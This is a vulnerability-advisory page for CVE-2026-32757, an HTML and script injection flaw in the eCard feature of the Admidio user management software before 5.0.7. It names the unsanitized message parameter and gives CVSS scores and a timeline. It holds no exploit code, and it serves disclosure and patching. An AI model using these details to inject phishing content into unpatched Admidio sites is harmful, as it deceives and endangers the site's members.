HTML Injection Vulnerability in Admidio User Management Solution
CVE-2026-32757

5.4MEDIUM

Key Information:

Vendor: Admidio
Status: Admidio
Vendor: CVE Published:; 19 March 2026

What is CVE-2026-32757?

Admidio, an open-source user management solution, has a vulnerability in versions 5.0.6 and earlier where the eCard send handler fails to sanitize user input adequately. Specifically, the raw $_POST['ecard_message'] is used to construct greeting card HTML instead of the sanitized version, allowing authenticated attackers to inject malicious HTML and JavaScript. This can lead to phishing attacks, as the compromised emails can be delivered to other members, appearing legitimate and bypassing the server-side HTMLPurifier validation. The issue has been addressed in version 5.0.7.

Affected Version(s)

admidio < 5.0.7

References

https://github.com/Admidio/admidio/security/advisories/GH...

x_refsource_CONFIRM

https://github.com/Admidio/admidio/releases/tag/v5.0.7

x_refsource_MISC

CVSS V3.1

Score:

5.4

Severity:

MEDIUM

Confidentiality:

Low

Integrity:

Low

Availability:

Low

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

Low

User Interaction:

Required

Scope:

Changed

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Mar 19, 2026
Vulnerability Reserved
Mar 13, 2026

CVE-2026-32757 Data

JSON